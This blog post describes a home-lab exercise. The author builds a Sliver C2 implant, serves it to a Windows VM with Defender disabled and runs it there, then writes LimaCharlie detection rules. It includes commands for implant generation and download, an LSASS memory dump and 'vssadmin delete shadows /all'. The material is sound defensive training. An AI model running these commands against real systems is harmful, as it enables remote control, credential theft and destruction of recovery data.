Home Lab Setup - Threat Detection With LimaCharlie EDR
In this post, I’ll walk you through my home lab setup, where I generate a C2 payload and analyze its behavior using LimaCharlie as my EDR solution. We’ll simulate a real-world attack scenario, monitor endpoint activity, and leverage threat-hunting techniques to detect and respond to malicious behavior.
For this setup, I’m using two virtual machines:
- Attacker Machine – Ubuntu VM for launching attacks.
- Victim Machine – Windows VM monitored by the EDR.
Setting up the attacker machine
Setting up a static IP address (optional)
- Change the interface's IPv4 method from DHCPv4 to Manual.
- Get the required values from the VMware Virtual Network Editor, and add ‘/24’ to the end of the subnet IP.
Select the option to install the OpenSSH server.
Setting up the victim machine
Disabling Windows Defender
I am using Sordum's Defender Control to disable Windows Defender, or you can disable it manually.
The following commands will prevent the VM from going into sleep mode:
```powershell
powercfg /change standby-timeout-ac 0
powercfg /change standby-timeout-dc 0
powercfg /change monitor-timeout-ac 0
powercfg /change monitor-timeout-dc 0
powercfg /change hibernate-timeout-ac 0
powercfg /change hibernate-timeout-dc 0
```
Installing Sysmon for Advanced Logging
```powershell
Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile C:\Windows\Temp\Sysmon.zip
Expand-Archive -LiteralPath C:\Windows\Temp\Sysmon.zip -DestinationPath C:\Windows\Temp\Sysmon
```
Configuring Sysmon
We’ll use SwiftOnSecurity’s Sysmon configuration:
```powershell
Invoke-WebRequest -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile C:\Windows\Temp\Sysmon\sysmonconfig.xml
C:\Windows\Temp\Sysmon\Sysmon64.exe -accepteula -i C:\Windows\Temp\Sysmon\sysmonconfig.xml
```
Verify Sysmon is Running
Install LimaCharlie EDR on Windows VM
Create Free LimaCharlie Account
- Sign up at LimaCharlie.io
- Create an Organization
- Add Sensor:
  - Select Windows
  - Choose the x86-64 (.exe) sensor
- Open PowerShell in administrator mode, download the sensor installer, and then open Command Prompt:
```powershell
cd C:\Users\User\Downloads
Invoke-WebRequest -Uri https://downloads.limacharlie.io/sensor/windows/64 -OutFile C:\Users\User\Downloads\lc_sensor.exe
cmd.exe
```
- Copy the LimaCharlie installation command and run it in Command Prompt.
- When the sensor is successfully installed, it will show up in the web UI.
Enable Sysmon Log Collection
- In the LimaCharlie Web UI, go to Artifact Collection.
- Click Add Rule and enter:
  - Name: `windows-sysmon-logs`
  - Platform: Windows
  - Path Pattern: `wel://Microsoft-Windows-Sysmon/Operational:*`
  - Retention: 10 days
- Click Save Rule.
Process
1. Installing Sliver
SSH into Ubuntu VM
It is much easier to use an SSH client to connect to the Ubuntu VM, since it gives us more control over the shell.
```bash
ssh user@[Linux_VM_IP]
```
Install Sliver C2 Framework
This will install the Sliver C2 framework.
```bash
sudo su
wget https://github.com/BishopFox/sliver/releases/download/v1.5.34/sliver-server_linux -O /usr/local/bin/sliver-server
chmod +x /usr/local/bin/sliver-server
apt install -y mingw-w64
mkdir -p /opt/sliver
```
2. Generating the C2 Payload
We will use Sliver C2 to generate the payload.
Accessing the Linux VM
Log in to the Linux shell and switch to the root user:
```bash
sudo su
```
Change the directory to the Sliver installation directory:
```bash
cd /opt/sliver
```
Start the Sliver C2 server:
```bash
sliver-server
```
Creating the Payload
Generate the C2 payload using the Ubuntu VM’s static IP address, which we set up at the beginning:
```
generate --http [Linux_VM_IP] --save /opt/sliver
```
Verify the implant we created:
```
implants
```
Exit Sliver for now:
```
exit
```
3. Transferring the Payload to the Windows VM
I am using a Python HTTP server to transfer the C2 payload from our Linux machine to the Windows VM.
Hosting the Payload on the Linux VM
Start a simple HTTP server on the Linux VM:
```bash
cd /opt/sliver
python3 -m http.server 80
```
Downloading the Payload on the Windows VM
- Open an Administrative PowerShell Console on the Windows VM.
- Download the C2 payload from the Linux VM:
```powershell
IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -OutFile C:\Users\User\Downloads\[payload_name].exe
```
- Replace `[Linux_VM_IP]` with the Linux VM’s IP address.
- Replace `[payload_name].exe` with the actual payload filename.
4. Establishing a C2 Session
Preparing the Listener on the Linux VM
Stop the Python web server with Ctrl + C and drop into the Sliver server:
```bash
sliver-server
```
Start an HTTP listener:
```
http
```
Executing the Payload on the Windows VM
Execute the payload from an Administrative PowerShell console:
```powershell
C:\Users\User\Downloads\[payload_name].exe
```
Confirming the Connection on the Linux VM
If the payload executed successfully, a session ID will appear in our shell. Check whether any session has been established:
```
sessions
```
Connect to the active session using its session ID:
```
use [session_id]
```
Gathering System Information
Now that the C2 session is established, we will gather system information to simulate an attacker’s reconnaissance activities.
System Reconnaissance Commands
Get basic system details about the session:
```
info
```
Check user privileges:
```
whoami
getprivs
```
If you executed the payload with admin rights, you will see some additional permissions.
Find the current working directory:
```
pwd
```
List active network connections:
```
netstat
```
List running processes:
```
ps -T
```
- Sliver highlights its own process in **green** and detected security tools in **red**.
Observing our EDR Telemetry
1. Setting Up LimaCharlie for Telemetry Analysis
Before diving into telemetry, ensure your Windows VM sensor is active in LimaCharlie:
- Navigate to the LimaCharlie Web UI.
- Click “Sensors” on the left menu.
- Select your active Windows sensor to access real-time system data.
2. Process Monitoring in LimaCharlie
One of the key aspects of EDR is process monitoring. Attackers often use malicious or compromised processes to establish persistence and execute payloads.
Viewing Running Processes
- In the sensor menu, click “Processes” to open the process tree.
- Look for unsigned processes, which could indicate suspicious activity.
- Hover over icons to see additional details such as digital signatures, parent-child relationships, and process execution details.
Identifying Suspicious Processes
- Malicious implants often appear as unsigned processes.
- LimaCharlie highlights security-related processes in red and its own monitoring process in green.
- Compare process behaviors against known legitimate system processes using resources like EchoTrail or the SANS Hunt Evil poster.
3. Analyzing Network Activity
Checking Network Connections
- Navigate to the “Network” tab in the sensor menu.
- Use Ctrl+F to search for known Indicators of Compromise (IoCs), such as:
  - The name of the C2 implant.
  - The IP address of the C2 server.
- Look for unexpected outbound connections to unfamiliar IPs, especially those associated with non-standard ports.
Identifying Suspicious Network Behavior
- A new or unknown process communicating externally is a red flag.
- A process making frequent connections to an external IP might indicate beaconing behavior.
- Compare connection logs with threat intelligence feeds to determine if an external IP is associated with known threats.
4. Investigating File System Activity
Many attacks involve dropping, modifying, or executing malicious files. Monitoring the file system helps detect these changes.
Finding Suspicious Files
- Go to the “File System” tab in LimaCharlie.
- Navigate to directories where suspicious files were recently executed (e.g., `C:\Users\User\Downloads`).
- Locate the C2 implant file or any unusual executables.
Verifying File Integrity with VirusTotal
- Use LimaCharlie’s “Scan with VirusTotal” feature.
- This checks the file’s hash against VirusTotal’s database to see if it’s flagged as malicious.
- If “Item not found”, it may be a new or custom-built malware sample—an indicator of targeted attacks.
5. Examining the Timeline for Event Correlation
The “Timeline” feature in LimaCharlie provides a real-time stream of security events and system activities.
Filtering and Searching for Threat Indicators
- Use filters to focus on events related to:
  - New process executions.
  - Network connections.
  - File modifications.
- Identify when the C2 implant was created, executed, and connected to an external IP.
Tracking an Attack Sequence
- Look for a chain of events leading to execution (e.g., file creation → execution → privilege escalation).
- Identify related detections such as SENSITIVE_PROCESS_ACCESS, which logs attempts to dump LSASS memory for credential theft.
6. Practical Exercise: Detecting a Credential Dumping Attempt
Step 1: Dumping LSASS Memory (Adversarial Action)
In your C2 session (Sliver), run:
```
procdump -n lsass.exe -s lsass.dmp
```
This simulates an attacker attempting to extract credentials from memory.
Step 2: Searching for the Event in LimaCharlie
- In the Timeline, filter for SENSITIVE_PROCESS_ACCESS events.
- Locate the process accessing lsass.exe.
- This provides visibility into how attackers attempt credential theft.
Step 3: Creating a Detection Rule
To detect this in the future, create a Detection & Response (D&R) rule.
Replace the detect section with this:
```yaml
event: SENSITIVE_PROCESS_ACCESS
op: ends with
path: event/*/TARGET/FILE_PATH
value: lsass.exe
```
and the respond section with this:
```yaml
- action: report
  name: LSASS access
```
- This triggers an alert whenever LSASS memory is accessed.
- Go to the “Detections” tab to see real-time alerts for similar attacks.
You can check the detection rule we built using the Test Event option before saving.
7. Practical Exercise: Detecting Volume Shadow Copy Deletion Attempt
One common tactic employed by ransomware is the deletion of Volume Shadow Copies to prevent system restoration.
Why Focus on Volume Shadow Copy Deletion?
Volume Shadow Copies allow users to restore files or entire systems to previous states. Ransomware often deletes these copies using commands like:
vssadmin delete shadows /all
This command is rarely used in regular operations, making it an excellent candidate for a blocking rule.
1. Implementing the Blocking Rule
To create an effective blocking rule, we first need to generate telemetry by executing the malicious command in a controlled environment.
- Access the Sliver C2 Session: Connect to your target session via the Sliver C2 framework.
- Execute the Command: Drop into an interactive shell:
```
shell
```
When prompted with “This action is bad OPSEC, are you an adult?” type `Y` and press Enter, then run:
```
vssadmin delete shadows /all
```
Note: The command's success is not essential; executing it will generate the necessary telemetry.
2. Detect the Activity Using LimaCharlie
- Access LimaCharlie: Navigate to the Detections tab to see if any default Sigma rules have flagged the activity.
- Examine the Detection: Expand the detection to view metadata and references, which provide insights into why this activity is suspicious.
3. Create a Detection & Response (D&R) Rule
- View the Event Timeline: In LimaCharlie, locate the raw event corresponding to the malicious activity.
- Craft the D&R Rule:
  - Detection Section: Configure the rule to detect the specific command execution.
  - Response Section: Define actions to take upon detection, such as terminating the offending process.
Example response configuration:
```yaml
- action: report
  name: vss_deletion_kill_it
- action: task
  command:
    - deny_tree
    - <<routing/parent>>
```
In this configuration, `action: report` generates a detection report, and `action: task` with `deny_tree` terminates the parent process responsible for the command.
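The post gives only the response half; the full rule below is an added example (not the post's own rule) that pairs a detect section with it. It assumes LimaCharlie's NEW_PROCESS event exposes the binary path at `event/FILE_PATH` and the command line at `event/COMMAND_LINE`; confirm both against the raw event you located in the Timeline before saving.

```yaml
# Added example: complete D&R rule for the Volume Shadow Copy deletion exercise.
# Detect: a newly created process whose binary is vssadmin.exe and whose
# command line contains "delete shadows". Field paths assume LimaCharlie's
# NEW_PROCESS event layout (event/FILE_PATH, event/COMMAND_LINE); verify them
# against the raw event in the Timeline for your sensor.
detect:
  event: NEW_PROCESS
  op: and
  rules:
    - op: ends with
      path: event/FILE_PATH
      value: vssadmin.exe
      case sensitive: false
    - op: contains
      path: event/COMMAND_LINE
      value: delete shadows
      case sensitive: false
# Respond: report the detection, then kill the parent process tree that
# launched vssadmin (here, the C2 implant's shell), as described above.
respond:
  - action: report
    name: vss_deletion_kill_it
  - action: task
    command:
      - deny_tree
      - <<routing/parent>>
```

Use the Test Event option with the raw vssadmin NEW_PROCESS event before saving, so a mismatched field path shows up as a non-match rather than a silent gap in coverage.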
4. Test the Blocking Rule
- Re-execute the Malicious Command: Run the `vssadmin delete shadows /all` command again in the Sliver C2 session.
- Verify the Response: The command should trigger the D&R rule, resulting in the termination of the parent process. To confirm, attempt to run another command (e.g., `whoami`). If the session is terminated or unresponsive, the blocking rule is functioning correctly.
That’s all for now! Let’s meet again with another interesting lab soon.